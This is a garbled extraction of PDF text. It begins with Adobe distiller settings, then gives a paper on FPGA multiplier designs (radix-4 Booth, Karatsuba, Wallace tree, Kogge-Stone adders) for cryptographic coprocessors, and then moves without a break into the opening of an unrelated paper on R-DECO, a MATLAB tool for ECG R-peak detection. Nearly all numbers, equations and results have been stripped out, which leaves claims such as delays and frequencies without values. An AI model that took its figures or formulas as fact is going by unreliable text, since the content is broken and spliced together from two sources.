true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , radix- design alternatives of fast two operands interleaved multiplication with enhanced architecture with fpga implementation & synthesize of -bit wallace tree csa based radix- booth multiplier mohammad m. asad king faisal university, department of electrical engineering, ahsa , saudi arabia e-mail: asadmosab@gmail.com ibrahim marouf king faisal university, department of electrical engineering, ahsa , saudi arabia e-mail: i.marouf@outlook.com qasem abu al-haija department of computer information and systems engineering tennessee state university, nashville, usa e-mail: qabualha@my.tnstate.edu abstract—in this paper, we proposed different comparable reconfigurable hardware implementations for the radix- fast two operands multiplier coprocessor using karatsuba method and booth recording method by employing carry save (csa) and kogge stone adders (ksa) on wallace tree organization. the proposed designs utilized family with target chip device along with simulation package. also, the proposed designs were synthesized and benchmarked in terms of the maximum operational frequency, the total path delay, the total design area and the total thermal power dissipation. the experimental results revealed that the best multiplication architecture was belonging to wallace tree csa based radix- booth multiplier ( ) which recorded: critical path delay of , maximum operational frequency of , hardware design area (number of logic elements) of , and total thermal power dissipation estimated as . consequently, method can be efficiently employed to enhance the speed of computation for many multiplication based applications such embedded system designs for public key cryptography. keywords-cryptography; computer arithmetic; fpga design; hardware synthesis; kogge-stone adder (ksa); radix- booth recording; karatsuba multiplier; wallace tree i. introduction recently, the vast promotion in the field of information and communication technology (ict) such as grid and fog computing has increased the inclination of having secret data sharing over the existing non- secure communication networks. this encouraged the researches to propose different solutions to ensure the safe access and store of private and sensitive data by employing different cryptographic algorithms especially the public key algorithms [ ] which proved robust security resistance against most of the attacks and security halls. public key cryptography is significantly based on the use of number theory and digital arithmetic algorithms. indeed, wide range of public key cryptographic systems were developed and embedded using hardware modules due to its better performance and security. this increased the demand on the embedded and system-on chip ( ) [ ] technologies employing several computers aided ( ) tools along with the configurable hardware processing units such as field programmable gate array ( ) and application specific integrated circuits ( ). therefore, considerable number of embedded coprocessors design were used to replace software based (i.e. programming based) solutions of different applications such as image processors, cryptographic processors, digital filters, low power application such as [ ] and others. the major part of designing such processors significantly encompasses the use computer arithmetic techniques in the underlying layers of processing. computer arithmetic [ ] or digital arithmetic is the science that combines mathematics with computer engineering and deals with representing integers and real values in digital systems and efficient algorithms doi: . /ijanmc- - mailto:asadmosab@gmail.com mailto:i.marouf@outlook.com mailto:qabualha@my.tnstate.edu international journal of advanced network, monitoring and controls volume , no. , for manipulating such numbers by means hardware circuitry and software routines. arithmetic operations on pairs of numbers x and y include addition ( y), subtraction ( – ), multiplication ( ), and division ( ). subtraction and division can be viewed as operations that undo the effects of addition and multiplication, respectively. multiplication operation is considered as a core operation that affect the performance of any embedded system. therefore, the use of fast multiplier units will result in enhancements in the overall performance of the system. recently, several solutions were proposed for multiplication algorithms while few of them were efficient [ ]. a multiplication algorithm [ ] is method to find the product of two numbers, i.e. . multiplication is an essential building block for several digital processors as it requires a considerable amount of processing time and hardware resources. depending on the size of the numbers, different algorithms are in use. elementary-school grade algorithm was multiplying each number digit by digit producing partial sum with complexity of ). [ ]for larger numbers, more efficient algorithms are needed. for example, let integers to be multiplied with equal to k bits, thus multiplications. however, more efficient and practical multiplication algorithms will be discussed in the following subsections. in this paper, we report on several fast alternative designs for radix- based multiplier unit including: radix- csa based booth multiplier, csa based radix- booth, wallace tree karatsuba multiplier, csa based radix- booth, ksa based karatsuba multiplier, csa based radix- booth, with comparator karatsuba multiplier, sequential -bit csa based radix- booth multiplier, -bit wallace tree csa based radix- booth multiplier (wcbm). the remaining of this paper is organized as follows: section m discusses the core components of efficient multiplier design. section ,provides the proposed design alternatives of radix- based multiplier, section , presents the synthesizing results and analysis, and, finally, section concludes the paper. ii. core design components-review two operands-multiplication is a substantial arithmetic operation since it plays a major role in the design of many embedded and digital signal processors [ ]. therefore, the efficient design and implementation of a fast multiplier unit is on demand. in this paper, we propose a competitive reconfigurable multiplier design using scalable and efficient modules. thus, the following subsections reviews the core design components for the proposed multiplier implementation unit. figure . carry save adder: (a) top view design (b) internal architecture a. carry save adder (csa) csa [ ] is a fast-redundant adder with constant carry path delay regardless of the number of operands’ bits. it produces the result as two-dimensional vectors: sum vector (or the partial sum) and carry vector (or partial carry). the advantage of csa is that the speed is constant regardless the number of bits. however, its area increases linearly with the number of bits. the top view of the csa unit along with its internal logic design architecture are provided in fig. below. in this work, we have implemented the csa adder using vhdl code for different bit sizes ranges from - bits through -bits [ ]. the synthesize results of total delay in ( ) and area in logic elements (les) were analyzed and reported in [ ] and they are illustrated in fig. . these results were generated using software [ ], simulated for model [ ] and they highly conform theoretical evaluation of csa operation since the delay time is almost equal for all bits. however, the area is almost double for each number of bits. also, the timing estimation of csa was generated via time analyzer tool provided in the package. accordingly, the critical path delay is which is data arrival time while the data delay is only . ns which provide a frequency of .finally, to verify the performance of csa, we have compared it with the well-known carry lockahead adder (cla) in terms of area and delay. cla is a carry propagation international journal of advanced network, monitoring and controls volume , no. , adder (cpa) with logarithmic relation between the carry propagation delay and the number of bits in operands. figure . delay-area analysis of csa vs cla implementations ( – bit) the simulation results of both csa and cla is provided in fig. shows that csa is superior in both area and speed. it has almost a constant time delay and relatively less area than cla. whereas cla time delay increases as the number of bit increases but not much as the area size. b. kogge-stone adder (ksa) ksa is a fast two operands parallel prefix adder (ppas) [ ] that executes addition on parallelized manner. ppas are just like cla but with an enhancement in the carry propagation stage (called the middle stage). there are five different variations of ppas namely: ladner-fischer adder (lfa), brent- kung adder (bka), kogge-stone adder (ksa), hans-carlson adder (hca), and sklansky adder (ska). these adders differ by the tree structure design to optimize certain aspects such as, performance, power, area size, and fan in/out. to verify the performance of all ppas, we have implemented them on fpga and the experimental results [ ] showed that ksa utilizes larger area size to achieve higher performance comparing among all other five ppas. thus, we decided to consider ksa as our basic carry propagation adder (cpa) to finalize the redundant results and to build up many other units that are in-need for conventional adder. in short, the simulation results of [ ] showed that ksa leading the other adders as it has the smallest time delay with only . . this result is very useful and conforms the theatrical modeling of ksa which has the least number of logic levels. like all ppas, ksa functionality consists of three computational stages as illustrated in fig. , as follows:  pre-processing stage: the computation of generate and propagate of each bit from a and b are done in this step. these signals are given by the logic equations: and  carry generation network: ppa differentiates from each other by the connections of the network. it computes carries of each bit by using generate and propagate signals from previous block. in this block two blocks are defined group generation and propagation (ggp), in addition to group generation only (ggo), as shown in fig. . logic blocks used for the calculation of generate and propagate bits can be describe by the following logic equations: and ), where the generation group have only logic equation for carry generation: .  post processing (calculating the sum):this is the last step and is common to all adders of this family (carry look ahead). it involves computation of sum bits. sum bits are computed by the logic given in: . the top view and the internal logic circuit is provided in the fig. . c. fast multi-operands addition addition operation is not commonly used to add two operands only, instead, it is more involved with multiplication and inner product computations [ ]. the use of regular two operands adders leads to intermediate results before getting the last answer which affect the performance or the time delay of a system. therefore, multi-operand adders are manly studied to reduce this problem. wallace and dadda trees [ ] are considered as two variations of high- performance multi-operands addition. fig. . shows the dot notation to represent the digit positions or international journal of advanced network, monitoring and controls volume , no. , alignments (instead of using the value which is quite useful) for the use of multi-operand addition in multiplication and inner-product computation. figure . kogge stone adder: (a) top view design of ksa (c) ksa stages (c) group generation and propagation in this work, we have adopted a csa based wallace tree since it confirmed better operands organization to improve the total addition delay [ ]. we have implemented two csa wallace trees: - operands addition and -operands addition. the structure logic diagram of operands is given in fig. . it’s clearly seen that the wallace tree unit is designed behaviorally (fsm is generated). figure . dot notation of multi-operand addition for multiplication and inner-product computation d. karatsuba multiplier to enhance the performance of multiplication for large operands (i.e. -bit size), a re-organization process can be adopted for the multiplication operands to utilize the maximum possible parallelism to enhance the multiplication time. karatsuba algorithm [ ] is pipelined multiplication process used mainly to construct the high precision multipliers form multiple small precision multiplier blocks by exploiting the maximum available parallelism between the multiplication blocks. the basic idea of karatsuba algorithm is illustrated in fig. and karatsuba algorithm can be defined as follows: let be integers and is the base (radix_ ) and where n: the number of digits, then: ) re-write as follows: and ) calculate product as follows: , where: , , , a more efficient implementation of karatsuba multiplication can be accomplished as: figure . multi-operand addition for operands. international journal of advanced network, monitoring and controls volume , no. , figure . aligning partial products. e. magnitude comparator the magnitude (or digital) comparator is a hardware electronic device that takes two numbers as input in binary form and determines whether one number is greater than, less than or equal to the other number. like that in binary addition, the efficient comparator can be implemented using g (generate) and p (propagate) signal for comparison. basically, the comparator involves two -bits: & can be realized by: ( ).( ) big b a b a b a b   ( ) eq ( ).( )a b a b   ( ) for a<b, “bbig, eq” is “ , ”. for a=b, “bbig, eq” is “ , ”. hence, for a>b, “bbig, eq” is “ , ”. where bbig is defined as output a less than b (a_lt_b).comparing eq. ( ) and ( ) with carry signal ( ): ( ). . out in in c ab a b c g p c     ( ) where a & b are binary inputs cin is carry input, cout is carry output, and g & p are generate & propagate signals, respectively. now, after comparing equations ( ) & ( ), we got: g a b , ( )eq a b  , in c a b ( ) cin can be considered as g . for this, encoding equation is given as: [ ] [ ] [ ]i i i g a b ( ) [ ] [ ] [ ] ( ) i i i eq a b  ( ) substituting the two values from equations ( ) & ( ) in ( ) & ( ) results in: [ j : j] [ j ] [ j ] [ ] . big j b g eq g      ( ) [ j : ] [ j ] [ j] . j eq eq eq    ( ) & signals can be further combined to form group & signals. for instance, for -bit comparator, & can be computed as: [ : ] . big k m k m k b g g eq              ( ) [ : ] m m eq eq   ( ) fig . shows the complete design of an -bit comparator as an example of this techniques where: i= … , j = … . iii. proposed multiplier design alternatives fundamentally, multiplication operation (along with fast addition) is a significant unit in almost all cryptographic coprocessors. for instance, in the design of ssc crypto-processor[ ], the multiplication primarily used to compute the square parameter the public key ( and the modulus ( . also, in the design of rsa crypto-processor, the multiplier is used to compute the modulus ( and the euler function [ ]. one more example, is the need for fast multipliers at several computation stages of ecc cryptosystem [ ]. indeed, wide range of methods have been proposed to address the efficient design of fast two operands arithmetic international journal of advanced network, monitoring and controls volume , no. , multiplier. in this paper, we have spent an extensive time to design an efficient multiplier by trying several variations of different multiplier design specifications. the first design was the implementation of radix- booth encoding multiplier. then, we tried many variations to employ this multiplier with different design methods. in the next subsections, we provide six design alternatives of the proposed multiplier to come up with the most cost-effective multiplier design. we finally report on the final implemented design. figure . the complete design of - bit comparatorincluding pre- encoding circuit and comp circuit a. radix- csa based booth multiplier unlike binary radix booth encoder, radix- booth encodes each group of three bits as shown in table . the encoding technique uses shift operation to produce a and a while a is equal to a+a. the logic diagram of implementing csa based radix- booth multiplier is shown in fig. . the use of csa provides very powerful performance with limited area cost. the partial products for radix- is n (where n is the number of operand bits). however, for radix the number of partial products is only n/ . table i. radix- booth encoding. inputs (bits of m-bit multiplier) partial product ppri a a a a a a a - a - a - a - a - a -a -a as can be seen from fig. , the multiplier accepts two -bit operands ( and ) and stores the operand ( ) in a shift register to select the group bits used in encoding whereas the operand ( ) processed with the international journal of advanced network, monitoring and controls volume , no. , booth encoder. the output of encoding stage is added via the sequential csa adder and the result is provided in a redundant representation (vector sum and vector carry). radix- booth encoder x shift register a csa_ bit partial sumpartial carry figure . design of radix- booth -bit multiplier reset mul_gen csa store data output start enable i<= i> figure . state machine diagram for -bit booth multiplier. also, fig. illustrates the fsm diagram of -bit booth multiplier. it starts with reset_state, where all signals and variables are cleared (i.e. reset). next state is mul_gen, where encoding is occurred. after that, the generated vector is added to the previous results of csa state. fourth, results are stored in store_state and moves back to mul_gen state in loop until all the bits are selected and encoded. finally, the output results are provided in output state.note that in radix- encoding the number of generated partial product vectors are computed by dividing the number of bits over , since each three bits are selected and used for encoding. b. csa based radix- booth, wallace tree karatsuba multiplier in this method, we combine the benefits of the bit reduction of radix booth along with the parallelism of csa based wallace tree as well as the pipelining process of karatsuba multiplication. thus, this design achieved minimum path delay and minimized area (i.e. the best performance). however, redundancy in this design produced one critical problem regarding the middle carry at the edges of blocks that affects the results. fig. illustrates the flow diagram for this design. here, we first designed a -bit karatsuba multiplier using a -bit csa based radix- booth for partial products calculation (as for our target design and since we are implementing -bit multiplier; m was chosen to be bits (half size)). first, the entered two operands are divided into halves . next, they are fed into the booth multiplier to compute the partial products as given in karatsuba formula. since the results are redundant and we have partial products according to karatsuba: . thus, partial products are generated. in the final stage, a csa based wallace tree was implemented to be used for adding the resulted partial products. final result is represented redundantly as vector sum and vector carry. this design achieves minimum path delay with limited area. however, redundancy in this design produces one critical problem that affects the results. as a rule-of- thumb, if we multiply two numbers (i.e. p and q), the multiplication result will be increased to . however, this is not the case when using redundant systems since the result is stored as two vectors and adding the two vectors to we tend to obtain the conventional product might result in . this additional bit brings up a new problem in the preliminary design. now, this problem can be solved by discarding the last carry when converting back to conventional representation. however, in karatsuba algorithm the numbers are split into -bit (original size is ). the result must be - bit, but in karatsuba case will be partial product vectors of -bit shifted in such a way that adding those vectors will result in -bit. thus, discarding all the generated carry when converting back to conventional system leads to error since only the carry generated of adding the two vectors corresponding to international journal of advanced network, monitoring and controls volume , no. , the same variable (or the same partial product in this case) needs to be discarded. other generated carries must be considered. fig. . demonstrate this problem graphically. generate karatsuba operands bit rad. booth multiplication four levels csa tree input two bit operands output bit sum and carry vectors operands bit vectors bit figure . design of -bit csa based radix- booth, wallace tree karatsuba multiplier. -bit booth radix- -bit booth radix- -bit booth radix- x=x b+x , -bit ( -bit each) y=y b+y , -bit ( -bit each) x y x y (x -x ) (y -y ) ps pc ps pc ps pc b (ps , pc ) b(ps , pc ) b(ps , pc ) (ps , pc ) b(ps , pc ) figure . graphical approaches to demonstrate the carry error (the mid-carry problem), here we have two cases:case i- ps + pc = might result in carry, result = -bit (wrong). carry must be discarded and case ii- ps + ps = might result in carry, result = -bit (correct). carry must be considered. eventually, the mid-carry problem was solved by either using -bit csa based radix- booth, ksa based karatsuba multiplier or using -bit csa based radix- booth, with comparator karatsuba multiplier. however, both solutions have added more overhead to design cost; therefore, this solution has been excluded. both solutions are discussed in the following subsections. ) csa based radix- booth, ksa based karatsuba multiplier. international journal of advanced network, monitoring and controls volume , no. , since the carry to be eliminated is the generated one from booth multiplier, a first thought is to exchange the csa adder with ksa adder to convert back the two vectors into one -bit number and discard any generated carry. all the vectors are reduced into five -bit vectors in parallel. this stage helps to eliminate the false carry without the need to do any further examination. ksa is a fast adder, thus this design maintains its high performance utilizing more logic elements. the logic diagram of the design is shown in fig. . ) csa based radix- booth, with comparator karatsuba multiplier. another noticeable design option can solve the mid- carry problem is to use a -bit comparator to test if the two vectors will generate a carry if yes, then do the correction step before input the vectors to csa tree. after booth multiplication stage, connect the vector sum and vector carry that may produce carry error to the inputs of -bit comparator unit, then perform correction if needed. finally, all vectors added using csa tree. the complete solution is depicted in fig. . generate karatsuba operands bit rad. booth multiplication bit ksa adder input two bit operands output bit sum and carry vectors three levels csa adder operands bit vectors bit operands bit figure . design of -bit: -bit csa based radix- booth, ksa based karatsuba multiplier. generate karatsuba operands bit rad. booth multiplication bit carry generate and kill input two bit operands bit comparator correction circuit five levels csa tree output bit sum and carry vectors operands bit vectors bit vectors bit vectors bit figure . karatsuba multiplication based on csa and comparator. note that the -bit comparator can be built with stages in total recording a total delay of level gate delay and area of gates (like the design of -bit comparator discussed in section. . ). to predict whether the carry will be generated or not, then we need to generate -bit g (generate) and k (kill) vectors. thus, we have three cases which might happen as follows:  case i: when . the carry is propagated. here we need to define the first carry state before . if the state is , then the vector does not need any correction. but, if the state is a state, then we need to subtract one from the highest bit (msb) of any vector to prevent the carry to .  case ii:when . here we have a state, so that no need to correction.  case iii:when .here is a state and a correction is needed. if this happed at highest bit (msb), then it needs to subtract ones. but if it after some , then this is case i. to define the first case, we have used a comparator to compare the two vectors as the comparator results:  : generate state happened first or it is the first state after propagation  : kill state happened first or it is the first state after propagation international journal of advanced network, monitoring and controls volume , no. ,  all states are propagating states, no need for correction because we do not have input carry ) comparisons between design ii & design iii we investigated both proposed design alternatives of karatsuba based multiplication theoretically in terms of critical path delay (using gate delay unit) and the area of the multiplier (how many gates used in the implementation). the results are shown in table below. table ii. comparison between design ii & design iii. design solutions # delay (gate delay) % optimization area (# of gates) % optimization solution i: using ksa adder. + % solution ii: using comparator unit. + % c. sequential -bit csa based radix- booth multiplier this design is accomplished by expanding the - bit booth to -bit. the two modules (i.e. -bit and -bit booth) differ only in the number of generated partial products. since radix- is used, partial products are generated in the new module instead of while other logic components remained the same. fig. shows the logic diagram of new -bit implementation. this design was implemented and was simulated on altera fpga kit recording a path delay of . ns for one loop and since the program runs times(i.e. partial products), thus the total path delay is . ns. also, this multiplier requires logic elements (les). radix- booth encoder x shift register a csa_ bit partial sumpartial curry figure . design of csa based radix- booth -bit multiplier. iv. synthesize results and analysis to speed up the performance of sequential -bit csa based radix- booth multiplier, we parallelized the addition of partial products produced in the same level by using wallace csa tree instead of sequential csa to exploit the maximum possible parallelism between the partial products to gain in speed and enhance the design performance. that’s it, we end up with implementing a -bit wallace tree csa based radix- booth multiplier (wcbm). the block diagram for the proposed design is shown in fig. . (a). the comparison with the other design alternatives showed that wallace tree csa based radix- booth multiplier (wcbm) has decreased the total delay and increased the operational speed for the multiplication operation. also, the design is modified to increase the frequency be dividing the program to three main states. the top view of our implemented wcbm unit is given in fig. . (b). it’s clearly seen that wcbm unit is triggered by clk signal along with enable line. the generated number can be obtained from the output portliness “sum” which is bits. besides the unit encompasses three control input signals (enable, reset, clk) and two control output signals (ack and ready). moreover, the finite state machine (fsm) diagram for the implemented wcbm is shown in fig. . (c). fsm consists of three main phases: partial product generation (initially, partial products are generated by using radix- booth encoding), wallace tree phase (these partial products are added by using levels wallace tree csa based) and ksa phase (because the result is redundant, ksa is used in the last phase to convert it to conventional result). finally, fig. . illustrates a sample numerical example of the proposed wcbm that is generated from quartus ii simulation tool. international journal of advanced network, monitoring and controls volume , no. , generate booth partial products csa tree ( levels) input two bit operands output bit sum and carry vectors pp bit vectors bit figure . (a) design architecture of wcbm (a) top level diagramwcbm (c) fsm diagram for wcbm. figure . sample run example of wcbm process of two -bit numbers international journal of advanced network, monitoring and controls volume , no. , the proposed multiplier implementation has been synthesized using altera cyclone ep cgx- cf c fpga kit to analyze several design factors such as design area, the total delay of the multiplication unit and the thermal power consumption of fpga implementation. we have evaluated the performance of the -bit wallace tree csa based radix- booth multiplier wcbm module for different data path sizes. timing analysis of the critical clock cycle for the implemented wcbm is illustrated in fig. . it can be seen from the graph that the critical path delay is . ns in which . ns for the clock delay and . ns for the data delay. this give a maximum frequency for the circuit of . mhz.in addition, the area of the design has recorded a constant number of logic elements (i.e. les) with the total thermal power dissipation estimated by using powerplay power analyzer tool of quartus ii software of . mw. figure . waveform sample of the proposed wcbm data delay v. conclusions and remarks multiplication operation is a core operation that domineer the performance of several public cryptographic algorithms such as rsa and ssc. in this paper, we have thoroughly discussed several design alternatives of radix- based multiplier unit by employing the karatsuba method and booth recording method with carry save and kogge stone adders on wallace tree organization. the proposed designs were evaluated in terms of many aspects including: maximum frequency and critical path delay, design area, and the total fpga power consumption. the proposed hardware cryptosystem design is conducted using altera cyclone fpga design technology along with the help of cad package of altera such as quartus ii and modelsim . . to sum up, we have successfully implemented and synthesized the wallace tree csa based radix- booth multiplier (wcbm) module via the target fpga technology for -bits. the synthesizer results showed an attractive results in terms of several design factors that can improve the computation performance for many multiplication based applications. references [ ] a.j. menezes, p.c. van oorschot and s.a. vanstone. ( ). handbook of applied cryptography”, crc press, boca raton, florida. [ ] k. javeed, x. wang and m. wang, 'serial and parallel interleaved modular multiplierson fpga platform', ieee th international conference on field programmable logic and applications (fpl), https://doi.org/ . /fpl. . [ ] d. j greaves, system on chip design and modelling, university of cambridge, computer laboratory, lecture notes, . http://www.cl.cam.ac.uk/teaching/ /sysonchip/socdam- notes .pdf. [ ] m. d. ercegovac and t. lang, ( ) 'digital arithmetic', morgan kaufmann publishers, elsevier, vol. , p.p. - . http://www.sciencedirect.com/science/book/ international journal of advanced network, monitoring and controls volume , no. , [ ] qasem abu al-haija, sharifah m. s. ahmad, "fast radix- sequential multiplier using kintex- fpga chip family", the open cybernetics & systemics journal, bentham open, vol. , . [ ] mohammed mosab asad, ibrahim marouf, qasem abu al-haija, "review of fast multiplication algorithms for embedded systems design", international journal of scientific & technology research volume , issue , . [ ] heath, steve ( ). embedded systems design. edn series for design engineers ( ed.). newnes. p. . isbn - - - - . an embedded system is a microprocessor based system that is built to control a function or a range of functions. [ ] i. marouf, m. m. asad, a. bakhuraibah and q. a. al-haija, "cost analysis study of variable parallel prefix adders using altera cyclone iv fpga kit," international conference on electrical and computing technologies and applications (icecta), ras al khaimah, , pp. - .doi: . /icecta. . [ ] altera co., “introduction to quartus ii software: ver . ”, intel quartus ii mnl- - . , . [ ] altera corporation, “cyclone iv device handbook”, vol. , cyiv- v - . , https://www.altera.com/, . [ ] s. butchibabu, s. kishore bab ( ). design and implementation of efficient parallel prefix adders on fpga, international journal of engineering research & technology, vol. issue no. . [ ] b. parhami, ( ), “computer arithmetic: algorithms and hardware designs”, oxford university press, oxford. [ ] d. purohit, h. joshi, ( ), ‘comparative study and analysis of fast multipliers’, international journal of engineering and technical research (ijetr), vol. , no. , . [ ] a. karatsuba and y. ofman, ( ) ‘multiplication of multidigit numbers on automata’, soviet physics, doklady, p.p. - . https://www.researchgate.net/publication/ _multiplication_ of_multidigit_numbers_on_automata [ ] qasem abu al-haija, mohamad m.asad, ibrahim marouf,"a systematic expository review of schmidt-samoa cryptosystem", international journal of mathematical sciences and computing(ijmsc), vol. , no. , pp. - , .doi: . /ijmsc. . . [ ] qasem abu al-haija, mahmoud smadi, monther al-ja’fari, abdullah al-shua’ibi, "efficient fpga implementation of rsa coprocessor using scalable modules", procedia computer science, elsevier, vol , . [ ] qasem abu al-haija, mohammad alkhatib, azmi b jaafar, "choices on designing gf(p) elliptic curve coprocessor benefiting from mapping homogeneous curves in parallel multiplications", international journal on computer science and engineering, engg journals publications, vol. , no. , . r-deco: an open-source matlab based graphical user interface for the detection and correction of r-peaks r-deco: an open-source matlab based graphical user interface for the detection and correction of r-peaks jonathan moeyersons , matthew amoni , , sabine van huffel , rik willems , and carolina varon stadius center for dynamical systems, signal processing and data analytics, department of electrical engineering (esat), ku leuven, leuven, belgium department of cardiovascular sciences, ku leuven, leuven, belgium department of cardiology, university hospitals leuven, leuven, belgium abstract many of the existing electrocardiogram (ecg) toolboxes focus on the derivation of heart rate variability features from rr-intervals. by doing so, they assume correct detection of the qrs-complexes. however, it is highly likely that not all detections are correct. therefore, it is recommended to visualize the actual r-peak positions in the ecg signal and allow manual adaptations. in this paper we present r-deco, an easy-to-use graphical user interface (gui) for the detection and correction of r-peaks. within r-deco, the r-peaks are detected by using a detection algorithm which uses an envelope-based procedure. this procedure flattens the ecg and enhances the qrs-complexes. the algorithm obtained an overall sensitivity of . % and positive predictive value of . % on the mit/bih arrhythmia database. additionally, r-deco includes support for several input data formats for ecg signals, three basic filters, the possibility to load other r-peak locations and intuitive methods to correct ectopic, wrong, or missed heartbeats. all functionalities can be accessed via the gui and the analysis results can be exported as matlab or excel files. the software is publicly available. through its easy-to-use gui, r-deco allows both clinicians and researchers to use all functionalities, without previous knowledge. subjects computational biology, algorithms and analysis of algorithms, data science, graphics, visual analytics keywords r-peak detection, r-peak correction, user interface, analysis software introduction the electrocardiogram (ecg) is one of the primary screening and diagnostic tools of the cardiologist. it records the electrical activity of the heart, which generates the myocardial contractions. a crucial step in the study of the ecg is the location of the qrs-complexes. as can be seen in fig. , these complexes are the most prominent waveforms in the ecg. they contain an enormous amount of information about the state of the heart. this is why the detection of the qrs-complexes constitutes the basis for almost all automated ecg analysis algorithms (kohler, hennig & orglmeister, ). once these have been identified, more elaborated analyses can be performed, such as heart rate variability (hrv). how to cite this article moeyersons j, amoni m, van huffel s, willems r, varon c. . r-deco: an open-source matlab based graphical user interface for the detection and correction of r-peaks. peerj comput. sci. :e doi . /peerj-cs. submitted may accepted september published october corresponding author jonathan moeyersons, jonathan.moeyersons@esat. kuleuven.be academic editor eibe frank additional information and declarations can be found on page doi . /peerj-cs. copyright moeyersons et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:jonathan.�moeyersons@�esat.�kuleuven.�be mailto:jonathan.�moeyersons@�esat.�kuleuven.�be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ four decades of automated qrs detection research has resulted in a variety of methods using different approaches. these methods can be stratified based on derivatives, digital filters, wavelet-transforms, classifiers, etc. (pan & tompkins, ; dohare, kumar & kumar, ; fujii et al., ; sharma & sunkaria, ; chen, chen & chan, ). despite the wide methodological variety, most of these qrs detectors have the same algorithmic structure. this can be divided in two steps: pre-processing and decision making (kohler, hennig & orglmeister, ). in the pre-processing step the qrs-complex is highlighted and the other signal components are suppressed to facilitate the detection. the resulting signal is then used to detect the occurrence of qrs-complexes in the decision making step. this is done by using either fixed or adaptive 